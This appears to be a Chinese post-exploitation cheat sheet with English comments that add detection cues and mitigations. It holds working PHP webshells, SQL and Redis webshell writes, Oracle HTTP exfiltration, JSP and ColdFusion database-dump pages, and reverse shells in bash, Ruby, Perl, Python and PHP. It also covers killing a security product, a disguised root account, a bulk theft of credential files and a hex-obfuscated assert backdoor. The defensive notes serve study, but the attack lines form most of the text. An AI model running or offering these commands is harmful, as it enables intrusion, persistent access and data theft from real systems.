PHP相关
<?php
/*
 * Four one-line PHP snippets of the kind collected on webshell cheat sheets:
 *   - copy() fetches a remote http URL straight into a file under the webroot (d:\www\shell.php);
 *   - include on an unvalidated $_GET value loads whatever path the request names;
 *   - assert() on a $_POST value evaluates request data as PHP code;
 *   - file_get_contents() on a remote URL pulls content from an external host and echoes it.
 * Detection cues: copy/include/file_get_contents applied to http URLs or to request superglobals,
 * and any assert() whose argument comes from a request. Turning off allow_url_fopen and
 * allow_url_include in php.ini removes the remote-fetch primitives used by the first and last line.
 */
?>
| <?php copy("http://x.x.x.x/shell.txt", "d:\www\shell.php"); ?>
<?php include "$_GET['_']"; ?>
<?php assert($_POST["1"]);?>
<?php $url = "http://x.x.x.x/shell.txt"; $contents = file_get_contents($url); echo $contents; ?>
Mysql数据库
phpmyadmin爆路径
| http://url/phpMyAdmin/libraries/select_lang.lib.php
SQL语句导出shell:
-- MySQL: SELECT ... INTO OUTFILE writes the selected literal to a path on the database server; the literal
-- here is a PHP eval() stub, so the statement is a file-write primitive used to plant a webshell in C:\www.
-- It requires the FILE privilege and is blocked when secure_file_priv is NULL or points outside the webroot,
-- which is the mitigation; INTO OUTFILE in query logs from an application account is worth an alert.
| select "<?php eval($_POST['1']);?>" into outfile 'C:\www\shell.php';
Redis数据库
写shell:
| config set dir D:\www config set dbfilename shell.php set webshell "<?php eval($_POST[x]);?>" save
Oracle数据库
查数据库ip
-- Oracle: SYS_CONTEXT('USERENV','IP_ADDRESS'). Oracle documents this value as the IP address of the machine
-- the client connected from, so despite the heading it identifies the connecting client, not the database host.
| select sys_context('userenv','ip_address') from dual
通过外连回传数据
-- Oracle: UTL_HTTP.request makes an HTTP request from the database server with the first USER_TABLES name
-- appended to the query string — an out-of-band exfiltration channel. Mitigation: do not grant UTL_HTTP to
-- application schemas, restrict reachable hosts with network ACLs, and alert on HTTP egress from DB hosts.
| SELECT UTL_HTTP.request('http://target.com/getdata?data='||TABLE_NAME) FROM USER_TABLES WHERE ROWNUM<=1
查询所有表
-- Oracle: every table the current user can access (ALL_TABLES), all columns.
-- Prefer an explicit column list (OWNER, TABLE_NAME, ...) over SELECT * outside a one-off.
| SELECT * FROM ALL_TABLES
查询当前用户表
-- Oracle: names of tables owned by the current schema only (USER_TABLES), a subset of ALL_TABLES.
| select table_name from user_tables;
查询所有表按大小排序
-- Oracle: two separate statements that the page rendering ran together on one line (ALL_TABLES, then
-- USER_TABLES). NUM_ROWS is filled in by optimizer statistics gathering, so the ordering reflects the last
-- stats run rather than the live row count, and is NULL for tables that were never analyzed.
| SELECT TABLE_NAME,NUM_ROWS FROM ALL_TABLES order by NUM_ROWS desc select table_name,NUM_ROWS from user_tables order by NUM_ROWS desc
查询表前十条
-- Oracle: ROWNUM < 10 yields at most 9 rows (not 10), and with no ORDER BY which rows come back is unspecified.
| select * from users where rownum < 10
分页查询 2000000 到 4000000
-- Oracle ROWNUM pagination: the inner query keeps the first 4000000 rows by ROWNUM, the outer one drops rn <= 2000000.
-- `user` in the innermost query presumably stands in for a real table name (USER is a reserved word in Oracle).
-- Without an ORDER BY in the innermost query the row order is unspecified, so successive pages may overlap or skip rows.
| SELECT * FROM (SELECT e.*,ROWNUM rn FROM (select * from user ) e WHERE ROWNUM <= 4000000) WHERE rn > 2000000
查询当前编码
-- Oracle: the session's NLS language/territory/character-set string (LANGUAGE_TERRITORY.CHARSET form).
| select userenv('language') from dual;
命令行执行
# Sets the Oracle client's NLS_LANG for this shell session (language_territory.charset); it governs
# client-side character-set conversion, so exported text comes out as UTF-8 instead of mojibake.
| export NLS_LANG="american_america.AL32UTF8"
拖库脚本
JSP1
<%-- Database dump page: opens a JDBC connection to the Oracle instance with credentials hard-coded in the
     source, runs SELECT * over the member table and writes the column names plus every row as comma-separated
     text to /webapps/ROOT/css/t1.txt, i.e. a file served from the document root. bw.flush() is called after
     each row; no close() of the writer or connection is visible, and out.print(rs) prints the ResultSet
     object itself rather than its rows. Detection cues for defenders: JSPs that load
     oracle.jdbc.driver.OracleDriver and call DriverManager.getConnection with literal passwords, and
     server-side writes of non-CSS content into the static/CSS directory. --%>
| <%@ page contentType="text/html;charset=UTF-8"%> <%@ page import="java.io.*,java.lang.*,java.sql.*"%> <% Class.forName("oracle.jdbc.driver.OracleDriver"); Connection conn = DriverManager.getConnection("jdbc:oracle:thin:@172.0.0.1:1521:orabi", "admin", "admin"); File f = new File("/webapps/ROOT/css/t1.txt"); BufferedWriter bw = new BufferedWriter(new FileWriter(f)); Statement stmt=conn.createStatement(ResultSet.TYPE_SCROLL_SENSITIVE,ResultSet.CONCUR_UPDATABLE); ResultSet rs=stmt.executeQuery("select * from member where rownum > 2000000"); ResultSetMetaData rsmd = rs.getMetaData(); int numberOfColumns = rsmd.getColumnCount(); for(int i=1;i<numberOfColumns+1;i++){ bw.write(rsmd.getColumnName(i)+","); } while (rs.next()){ for(int i=1;i<numberOfColumns+1;i++){ bw.write(rs.getString(i)+","); } bw.newLine(); bw.flush(); } out.print(rs); %>
JSP2
<%-- Table-walk dump page: reads one table name per line from /tmp/data.txt, for each runs
     "select * from " + line + " where rownum < 100" (SQL assembled by string concatenation from file
     contents), renders the first rows as an HTML table, and writes the accumulated HTML to /tmp/info.css.
     Credentials are hard-coded in the source; resources are closed explicitly at the end.
     Detection cues: JSPs that build SQL from file input, and HTML written to a file with a .css extension
     under /tmp. --%>
| <%@ page contentType="text/html;charset=UTF-8"%> <%@ page import="java.io.*,java.lang.*,java.sql.*"%> <% Class.forName("oracle.jdbc.driver.OracleDriver"); Connection conn = DriverManager.getConnection("jdbc:oracle:thin:@127.0.0.1:1521", "admin", "password"); Statement stmt=conn.createStatement(ResultSet.TYPE_SCROLL_SENSITIVE,ResultSet.CONCUR_UPDATABLE); String html=""; File file = new File("/tmp/data.txt"); BufferedReader br = new BufferedReader(new FileReader(file)); String line; while ((line = br.readLine()) != null) { html=html+"<h3>"+line+":</h3><table border=1><tr>"; ResultSet rs=stmt.executeQuery("select * from "+line+" where rownum < 100"); ResultSetMetaData rsmd = rs.getMetaData(); int numberOfColumns = rsmd.getColumnCount(); for(int i=1;i<numberOfColumns+1;i++){ html=html+"<th>"+rsmd.getColumnName(i)+"</th>"; } html+="</tr>"; while (rs.next()){ html+="<tr>"; for(int i=1;i<numberOfColumns+1;i++){ html=html+"<td>"+rs.getString(i)+"</td>"; } html+="</tr>"; } rs.close(); html+="<tr></table>"; } File f = new File("/tmp/info.css"); BufferedWriter bw = new BufferedWriter(new FileWriter(f)); bw.write(html); bw.close(); br.close(); stmt.close(); conn.close(); %>
ColdFusion
<!--- ColdFusion dump: runs SELECT * FROM MEMBER against datasource ya_db with username/password set inline,
      swallows any failure via CFCATCH Type="Any", serializes the query result with CFDUMP FORMAT="TEXT" and
      writes it to C:\RECYCLER\<username>_DATA.txt. Detection cues: cffile action="write" aimed at paths
      outside the application directory, and cfquery tags carrying literal credentials in source. --->
| <CFSET USERNAME="user"> <CFSET PASSWORD="pass"> <CFSET DATABASE="ya_db"> <CFTRY> <CFQUERY NAME="DATA" DATASOURCE=#DATABASE# USERNAME=#USERNAME# PASSWORD=#PASSWORD#> SELECT * FROM MEMBER </CFQUERY> <CFCATCH Type="Any"></CFCATCH> </CFTRY> <CFSAVECONTENT variable="Dump_DATA"> <CFDUMP var="#DATA#" EXPAND="YES" FORMAT="TEXT"> </CFSAVECONTENT> <cffile action="write" output="#Dump_DATA#" FILE="C:\\RECYCLER\\#USERNAME#_DATA.txt">
反弹shell
bash
# Reverse shell: an interactive bash with stdin/stdout/stderr redirected through bash's /dev/tcp
# pseudo-device to 1.1.1.1:1234. Detection cues: a bash process whose standard descriptors are a socket,
# and outbound connections originating from service accounts (web server, database); egress filtering
# from server segments is the control that blunts this whole family.
| bash -i >& /dev/tcp/1.1.1.1/1234 0>&1
# Named-pipe variant: removes and recreates a FIFO at /tmp/p, then uses telnet to 1.1.1.1:1234 to carry
# the session. Detection cues: mknod/mkfifo in /tmp immediately followed by a telnet process with an
# outbound connection.
| rm -f /tmp/p; mknod /tmp/p p && telnet 1.1.1.1 1234 0/tmp/p
ruby
# Reverse shell in Ruby: opens a TCP socket to 1.1.1.1:1234 and execs /bin/sh -i with all three standard
# descriptors duplicated onto the socket's fd. Detection cues: ruby -e combined with -rsocket and an exec
# of /bin/sh, and a ruby process holding a socket as stdio.
| ruby -rsocket -e'f=TCPSocket.open("1.1.1.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
perl
# Reverse shell in Perl: connects to 1.1.1.1:1234 and reopens STDIN/STDOUT/STDERR on the socket before
# exec("/bin/sh -i"). Detection cues: perl -e containing 'use Socket' together with an exec of a shell.
| perl -e 'use Socket;$i="1.1.1.1"; $p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp")) if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S"); open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
python
# Reverse shell in Python: connects to 1.1.1.1:1234, dup2()s the socket over fds 0-2 and spawns /bin/sh -i.
# Detection cues: python -c importing socket, subprocess and os with os.dup2 on one line, and a python
# process whose stdio is a socket.
| python -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("1.1.1.1",1234)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);'
php
# Reverse shell from the PHP CLI: fsockopen() to 1.1.1.1:1234, then exec() of /bin/sh -i with fd 3 (the
# socket) redirected onto stdin/stdout/stderr. Detection cues: php -r with fsockopen and exec on the same line.
| php -r '$sock=fsockopen("1.1.1.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
Windows取消共享文件夹安全警告
REM Writes the LowRiskFileTypes value under the per-user Associations policy key named on the line so the
REM listed extensions (.exe, .bat, .vbs, ...) open without the "Open File - Security Warning" prompt.
REM Defenders: this is a user-level policy override; monitor Reg add / registry writes to that key.
REM The page rendering collapsed two lines (@echo off, Reg add) into one.
| @echo off Reg add HKCU\Software\Microsoft\Windows\CurrentVersion\PolicIEs\Associations /v LowRiskFileTypes /t REG_SZ /d .exe;.reg;.msi;.bat;.cmd;.com;.vbs;.hta;.scr;.pif;.js;.lnk; /f
kill安全狗3.x
REM Terminates SafeDogGuardCenter.exe by attaching the ntsd debugger to it by name (-pn) and immediately
REM quitting (-c q), which ends the debuggee. Detection cues: ntsd.exe launched with -pn against security
REM product processes; not shipping debugger binaries on production servers removes the primitive.
| ntsd -c q -pn SafeDogGuardCenter.exe
其他
python Simple HTTP服务:
# Serves the current directory over HTTP (default port 8000) with Python 2's SimpleHTTPServer module;
# Python 3 moved it to `python3 -m http.server`.
| python -m SimpleHTTPServer
Linux相关技巧
压缩目录
# Three archive commands that the rendering ran together on one line: zip -r of /root, tar -czvf of /root,
# and tar -cvf of user/ with a list of --exclude patterns (one of them, `--exclude=`, is empty).
# Defenders: archiving of home directories by an account that does not normally do so is a common
# collection/staging signal in incident timelines.
| zip -r root.zip /root/* tar -czvf root.tar.gz /root/ tar -cvf user/tmp/ooouser.tar user/ --exclude=image --exclude= --exclude *.jpg --exclude *.gif --exclude *.zip --exclude *.bmp --exclude *.eps --exclude *.psd
添加用户并设置密码
# Creates a user named lsof with UID 0 (-u 0, with -o permitting the duplicate uid), primary and
# supplementary group root, a /bin/bash shell and /usr/bin/lsof as home directory; the password "admin"
# is pre-hashed with openssl passwd -1 (md5-crypt, salt lsof). The name mimics the lsof utility.
# Defender checks: any second UID-0 entry in /etc/passwd, useradd invoked with -o or -u 0, and home
# directories located under /usr/bin.
| useradd -p `openssl passwd -1 -salt 'lsof' admin` -u 0 -o -g root -G root -s /bin/bash -d /usr/bin/lsof lsof
收集所有.sh .pl .py .conf .cnf .ini .*history .pass (/usr/share目录里面的除外) 并打包成zip
# Walks the whole filesystem (excluding /usr/share) for shell/Perl/Python scripts, .conf/.cnf/.ini files,
# dot-history files and anything with "pass" in a dotfile name, and pipes the list to zip -@ (file names
# read from stdin) into pack.zip. Defender cues: a find over / paired with zip -@ or tar, run by a
# service account, is a collection/staging pattern worth alerting on.
| find / \! -path “/usr/share/*” -regex “.*\.sh$\|.*\.pl$\|.*\.py$\|.*\.conf$\|.*\.cnf$\|.*\.ini$\|.*\/\..*history$\|.*\/\..*pass.*” -print|zip pack.zip -@
array_push 后门
// Backdoor idiom: "ass\x65rt" is "assert" with one letter written as a hex escape, so a plain text search
// for assert does not match it; array_map then calls assert() on every element of the request-supplied
// array, evaluating each as PHP. Detection: decode string escapes before signature matching, and flag any
// callable passed to array_map/call_user_func that resolves to assert.
| array_map("ass\x65rt",(array)$_REQUEST['array']);